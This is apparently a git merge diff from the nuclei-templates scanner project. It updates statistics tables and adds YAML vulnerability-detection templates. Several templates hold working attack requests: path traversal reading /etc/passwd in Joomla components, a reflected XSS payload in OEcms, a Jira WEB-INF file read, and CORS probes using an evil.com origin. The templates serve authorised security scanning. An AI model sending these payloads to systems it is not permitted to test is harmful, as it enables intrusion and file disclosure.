Merge remote-tracking branch 'origin' into dynamic_attributes
commit
a4250b8f2f
20
README.md
20
README.md
|
@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
|
|||
|
||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 624 | pikpikcu | 243 | cves | 631 | info | 592 | http | 1785 |
|
||||
| panel | 222 | dhiyaneshdk | 240 | vulnerabilities | 281 | high | 504 | file | 46 |
|
||||
| xss | 221 | pdteam | 196 | exposed-panels | 225 | medium | 398 | network | 38 |
|
||||
| exposure | 212 | daffainfo | 160 | exposures | 182 | critical | 230 | dns | 11 |
|
||||
| wordpress | 203 | geeknik | 149 | technologies | 160 | low | 161 | | |
|
||||
| lfi | 203 | dwisiswant0 | 131 | misconfiguration | 125 | | | | |
|
||||
| rce | 189 | gy741 | 71 | takeovers | 71 | | | | |
|
||||
| cve | 632 | dhiyaneshdk | 245 | cves | 640 | info | 603 | http | 1807 |
|
||||
| panel | 232 | pikpikcu | 244 | vulnerabilities | 283 | high | 510 | file | 46 |
|
||||
| xss | 224 | pdteam | 198 | exposed-panels | 231 | medium | 402 | network | 38 |
|
||||
| exposure | 214 | daffainfo | 164 | exposures | 184 | critical | 232 | dns | 11 |
|
||||
| lfi | 207 | geeknik | 149 | technologies | 163 | low | 160 | | |
|
||||
| wordpress | 203 | dwisiswant0 | 132 | misconfiguration | 125 | | | | |
|
||||
| rce | 189 | gy741 | 72 | takeovers | 71 | | | | |
|
||||
| cve2020 | 157 | madrobot | 62 | default-logins | 51 | | | | |
|
||||
| wp-plugin | 136 | princechaddha | 53 | file | 46 | | | | |
|
||||
| cve2021 | 103 | pussycat0x | 42 | workflows | 35 | | | | |
|
||||
| wp-plugin | 136 | princechaddha | 54 | file | 46 | | | | |
|
||||
| tech | 105 | pussycat0x | 44 | workflows | 35 | | | | |
|
||||
|
||||
**146 directories, 1940 files**.
|
||||
**146 directories, 1962 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
|
File diff suppressed because one or more lines are too long
1416
TEMPLATES-STATS.md
1416
TEMPLATES-STATS.md
File diff suppressed because it is too large
Load Diff
18
TOP-10.md
18
TOP-10.md
|
@ -1,12 +1,12 @@
|
|||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 624 | pikpikcu | 243 | cves | 631 | info | 592 | http | 1785 |
|
||||
| panel | 222 | dhiyaneshdk | 240 | vulnerabilities | 281 | high | 504 | file | 46 |
|
||||
| xss | 221 | pdteam | 196 | exposed-panels | 225 | medium | 398 | network | 38 |
|
||||
| exposure | 212 | daffainfo | 160 | exposures | 182 | critical | 230 | dns | 11 |
|
||||
| wordpress | 203 | geeknik | 149 | technologies | 160 | low | 161 | | |
|
||||
| lfi | 203 | dwisiswant0 | 131 | misconfiguration | 125 | | | | |
|
||||
| rce | 189 | gy741 | 71 | takeovers | 71 | | | | |
|
||||
| cve | 632 | dhiyaneshdk | 245 | cves | 640 | info | 603 | http | 1807 |
|
||||
| panel | 232 | pikpikcu | 244 | vulnerabilities | 283 | high | 510 | file | 46 |
|
||||
| xss | 224 | pdteam | 198 | exposed-panels | 231 | medium | 402 | network | 38 |
|
||||
| exposure | 214 | daffainfo | 164 | exposures | 184 | critical | 232 | dns | 11 |
|
||||
| lfi | 207 | geeknik | 149 | technologies | 163 | low | 160 | | |
|
||||
| wordpress | 203 | dwisiswant0 | 132 | misconfiguration | 125 | | | | |
|
||||
| rce | 189 | gy741 | 72 | takeovers | 71 | | | | |
|
||||
| cve2020 | 157 | madrobot | 62 | default-logins | 51 | | | | |
|
||||
| wp-plugin | 136 | princechaddha | 53 | file | 46 | | | | |
|
||||
| cve2021 | 103 | pussycat0x | 42 | workflows | 35 | | | | |
|
||||
| wp-plugin | 136 | princechaddha | 54 | file | 46 | | | | |
|
||||
| tech | 105 | pussycat0x | 44 | workflows | 35 | | | | |
|
||||
|
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1306
|
||||
|
||||
info:
|
||||
name: Joomla! Component Picasa 2.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12058
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1306
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1954
|
||||
|
||||
info:
|
||||
name: Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot) component 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12287
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1954
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,33 @@
|
|||
id: CVE-2018-12095
|
||||
|
||||
info:
|
||||
name: OEcms 3.1 - Cross-Site Scripting
|
||||
author: LogicalHunter
|
||||
severity: medium
|
||||
description: A Reflected Cross-Site Scripting web vulnerability has been discovered in the OEcms v3.1 web-application. The vulnerability is located in the mod parameter of info.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/44895
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12095
|
||||
- https://cxsecurity.com/issue/WLB-2018060092
|
||||
tags: cve,cve2018,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '</script><script>alert(document.domain)</script>'
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -2,7 +2,7 @@ id: CVE-2019-15501
|
|||
|
||||
info:
|
||||
name: LSoft ListServ - XSS
|
||||
author: Borna Nematzadeh
|
||||
author: LogicalHunter
|
||||
severity: medium
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/47302
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2019-8937
|
|||
|
||||
info:
|
||||
name: HotelDruid 2.3.0 - XSS
|
||||
author: Borna Nematzadeh
|
||||
author: LogicalHunter
|
||||
severity: medium
|
||||
refrense: https://www.exploit-db.com/exploits/46429
|
||||
tags: cve,cve2019,xss,hoteldruid
|
||||
|
|
|
@ -0,0 +1,29 @@
|
|||
id: CVE-2021-26086
|
||||
|
||||
info:
|
||||
name: Jira Limited Local File Read
|
||||
author: cocxanh
|
||||
severity: medium
|
||||
description: Affected versions of Atlassian Jira Server and Data Center allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint.
|
||||
reference:
|
||||
- https://jira.atlassian.com/browse/JRASERVER-72695
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-26086
|
||||
tags: cve,cve2021,jira,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "<web-app"
|
||||
- "</web-app>"
|
||||
part: body
|
||||
condition: and
|
|
@ -17,17 +17,20 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/"
|
||||
- "{{BaseURL}}/login/showlogin"
|
||||
- "{{BaseURL}}"
|
||||
|
||||
headers:
|
||||
Host: "{{randstr}}.tld"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- (EXPONENT\.(?:(?:J(?:QUERY|S)_UR|URL_FUL)|YUI2_UR)L=")?https?://{{randstr}}\.tld
|
||||
- type: word
|
||||
words:
|
||||
- '{{randstr}}.tld'
|
||||
- 'EXPONENT.PATH'
|
||||
- 'EXPONENT.URL'
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
id: can-i-take-over-dns
|
||||
id: can-i-take-over-dns-fingerprint
|
||||
|
||||
info:
|
||||
name: Can I Take Over DNS - Fingerprint
|
||||
|
|
|
@ -0,0 +1,32 @@
|
|||
id: epson-unauthorized-access-detect
|
||||
|
||||
info:
|
||||
name: Epson Printer
|
||||
author: pussycat0x
|
||||
severity: medium
|
||||
reference: https://www.exploit-db.com/ghdb/6922
|
||||
tags: iot,printer,panel,unauth
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/PRESENTATION/EPSONCONNECT"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "Epson Connect"
|
||||
- "/IMAGE/EPSONLOGO.PNG"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- "<title>([A-Z-0-9]+) Series</title>"
|
|
@ -0,0 +1,25 @@
|
|||
id: epson-web-control-detect
|
||||
info:
|
||||
name: Epson Printer
|
||||
author: pussycat0x
|
||||
severity: info
|
||||
reference: https://www.exploit-db.com/ghdb/6873
|
||||
tags: iot,printer,panel,unauth
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/cgi-bin/home"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "Epson Web Control"
|
||||
- "Basic Control"
|
||||
- "Advanced"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,23 @@
|
|||
id: honeywell-web-controller
|
||||
|
||||
info:
|
||||
name: Honeywell XL Web Controller
|
||||
author: dhiyaneshDK
|
||||
severity: info
|
||||
reference: https://www.exploit-db.com/ghdb/7130
|
||||
tags: panel
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/standard/default.php'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<title>Honeywell XL Web Controller</title>'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,23 @@
|
|||
id: ibm-note-login
|
||||
|
||||
info:
|
||||
name: IBM iNotes Login
|
||||
author: dhiyaneshDK
|
||||
severity: info
|
||||
reference: https://www.exploit-db.com/ghdb/7122
|
||||
tags: panel
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}'
|
||||
- '{{BaseURL}}/names.nsf'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<title>IBM iNotes Login</title>'
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,31 @@
|
|||
id: lacie-panel
|
||||
|
||||
info:
|
||||
name: LaCie Login Panel
|
||||
author: dhiyaneshDK
|
||||
severity: info
|
||||
reference: https://www.exploit-db.com/ghdb/7118
|
||||
tags: panel
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}'
|
||||
- '{{BaseURL}}/dashboard/'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- 'id_LaCie'
|
||||
part: body
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- '(?m)<title>([a-zA-Z0-9&#; ]|)+Dashboard<\/title>$'
|
||||
part: body
|
||||
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,22 @@
|
|||
id: web-service-panel
|
||||
|
||||
info:
|
||||
name: WEB SERVICE Panel
|
||||
author: dhiyaneshDK
|
||||
severity: info
|
||||
reference: https://www.exploit-db.com/ghdb/7116
|
||||
tags: panel
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<title>WEB SERVICE</title>'
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,30 @@
|
|||
id: axis-happyaxis
|
||||
|
||||
info:
|
||||
name: Axis Happyaxis Exposure
|
||||
author: dogasantos
|
||||
severity: info
|
||||
tags: axis,axis2,middleware,exposure,apache
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/axis2/axis2-web/HappyAxis.jsp"
|
||||
- "{{BaseURL}}/axis/happyaxis.jsp"
|
||||
- "{{BaseURL}}/axis2-web/HappyAxis.jsp"
|
||||
- "{{BaseURL}}/happyaxis.jsp"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "Axis Happiness Page"
|
||||
- "Axis2 Happiness Page"
|
||||
- "Examining Application Server"
|
||||
- "Examining Version Service"
|
||||
- "Examining System Properties"
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,33 @@
|
|||
id: glpi-status-domain-disclosure
|
||||
|
||||
info:
|
||||
name: GLPI Status Domain Disclosure
|
||||
author: dogasantos
|
||||
severity: info
|
||||
tags: glpi,exposure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/status.php"
|
||||
- "{{BaseURL}}/glpi/status.php"
|
||||
- "{{BaseURL}}/glpi2/status.php"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "GLPI_"
|
||||
- "LDAP server"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- '((\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})|([a-zA-Z0-9]+(\.[a-zA-Z0-9]{2,3}){1,2}))'
|
|
@ -0,0 +1,25 @@
|
|||
id: glpi-telemetry-disclosure
|
||||
|
||||
info:
|
||||
name: GLPI Telemetry Disclosure
|
||||
author: dogasantos
|
||||
severity: info
|
||||
tags: glpi,exposure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/ajax/telemetry.php"
|
||||
- "{{BaseURL}}/glpi/ajax/telemetry.php"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '"uuid":'
|
||||
- '"glpi":'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,9 +1,9 @@
|
|||
id: ftp-default-credentials
|
||||
|
||||
info:
|
||||
name: FTP Service with default credentials
|
||||
name: FTP Service with anonymous Login
|
||||
author: pussycat0x
|
||||
severity: low
|
||||
severity: info
|
||||
tags: network,ftp,default-login
|
||||
|
||||
network:
|
||||
|
@ -18,3 +18,5 @@ network:
|
|||
- type: word
|
||||
words:
|
||||
- "230"
|
||||
- "Anonymous user logged in"
|
||||
condition: and
|
|
@ -0,0 +1,31 @@
|
|||
id: apache-axis-detect
|
||||
|
||||
info:
|
||||
name: apache-axis-detect
|
||||
author: dogasantos
|
||||
severity: info
|
||||
description: Axis and Axis2 detection
|
||||
tags: tech,axis2,middleware,apache
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
- "{{BaseURL}}/axis2/"
|
||||
- "{{BaseURL}}/axis/"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "Validate"
|
||||
- "Welcome"
|
||||
- "Axis"
|
||||
- "deployed"
|
||||
- "installation"
|
||||
- "Admin"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: glpi-cms-detect
|
||||
|
||||
info:
|
||||
name: GLPI Cms Detection
|
||||
author: dogasantos
|
||||
severity: info
|
||||
tags: glpi,cms,php
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
- "{{BaseURL}}/glpi/"
|
||||
- "{{BaseURL}}/glpi2/"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "CFG_GLPI"
|
||||
- "_glpi_csrf_token"
|
||||
- "GLPI Copyright"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,23 @@
|
|||
id: synology-web-station
|
||||
|
||||
info:
|
||||
name: Synology Web Station
|
||||
author: dhiyaneshDK
|
||||
severity: info
|
||||
reference: https://www.exploit-db.com/ghdb/7125
|
||||
tags: tech
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<title>Hello! Welcome to Synology Web Station!</title>'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,22 +0,0 @@
|
|||
id: basic-cors-misconfig
|
||||
|
||||
info:
|
||||
name: Basic CORS misconfiguration
|
||||
author: nadino
|
||||
severity: info
|
||||
tags: cors,generic
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
headers:
|
||||
Origin: https://evil.com
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "Access-Control-Allow-Origin: https://evil.com"
|
||||
- "Access-Control-Allow-Credentials: true"
|
||||
condition: and
|
||||
part: header
|
|
@ -0,0 +1,66 @@
|
|||
id: cors-misconfig
|
||||
|
||||
info:
|
||||
name: Basic CORS misconfiguration
|
||||
author: nadino,G4L1T0,convisoappsec,pdteam
|
||||
severity: info
|
||||
reference: https://portswigger.net/web-security/cors
|
||||
tags: cors,generic
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{randstr}}.com
|
||||
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: null
|
||||
|
||||
# - |
|
||||
# GET / HTTP/1.1
|
||||
# Host: {{Hostname}}
|
||||
# Origin: {{randstr}}.{{Hostname}}
|
||||
#
|
||||
# - |
|
||||
# GET / HTTP/1.1
|
||||
# Host: {{Hostname}}
|
||||
# Origin: {{Hostname}}{{randstr}}
|
||||
|
||||
# TO DO for future as currently {{Hostname}} is not supported in matchers
|
||||
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: dsl
|
||||
name: arbitrary-origin
|
||||
dsl:
|
||||
- "contains(tolower(all_headers), 'access-control-allow-origin: {{randstr}}.com')"
|
||||
- "contains(tolower(all_headers), 'access-control-allow-credentials: true')"
|
||||
condition: and
|
||||
|
||||
- type: dsl
|
||||
name: null-origin
|
||||
dsl:
|
||||
- "contains(tolower(all_headers), 'access-control-allow-origin: null')"
|
||||
- "contains(tolower(all_headers), 'access-control-allow-credentials: true')"
|
||||
condition: and
|
||||
|
||||
- type: dsl
|
||||
name: wildcard-acac
|
||||
dsl:
|
||||
- "contains(tolower(all_headers), 'access-control-allow-origin: *')"
|
||||
- "contains(tolower(all_headers), 'access-control-allow-credentials: true')"
|
||||
condition: and
|
||||
|
||||
- type: dsl
|
||||
name: wildcard-no-acac
|
||||
dsl:
|
||||
- "contains(tolower(all_headers), 'access-control-allow-origin: *')"
|
||||
- "!contains(tolower(all_headers), 'access-control-allow-credentials: true')"
|
||||
condition: and
|
|
@ -21,7 +21,7 @@ requests:
|
|||
- '{{BaseURL}}/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://example.com'
|
||||
- '{{BaseURL}}/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://example.com'
|
||||
- '{{BaseURL}}/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://example.com'
|
||||
- '{{BaseURL}}bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com'
|
||||
- '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com'
|
||||
- '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com'
|
||||
|
||||
matchers-condition: and
|
||||
|
|
|
@ -21,6 +21,8 @@ requests:
|
|||
words:
|
||||
- 'sqli-test'
|
||||
- 'attribute_counts'
|
||||
- 'price_range'
|
||||
- 'term'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
|
|
Loading…
Reference in New Issue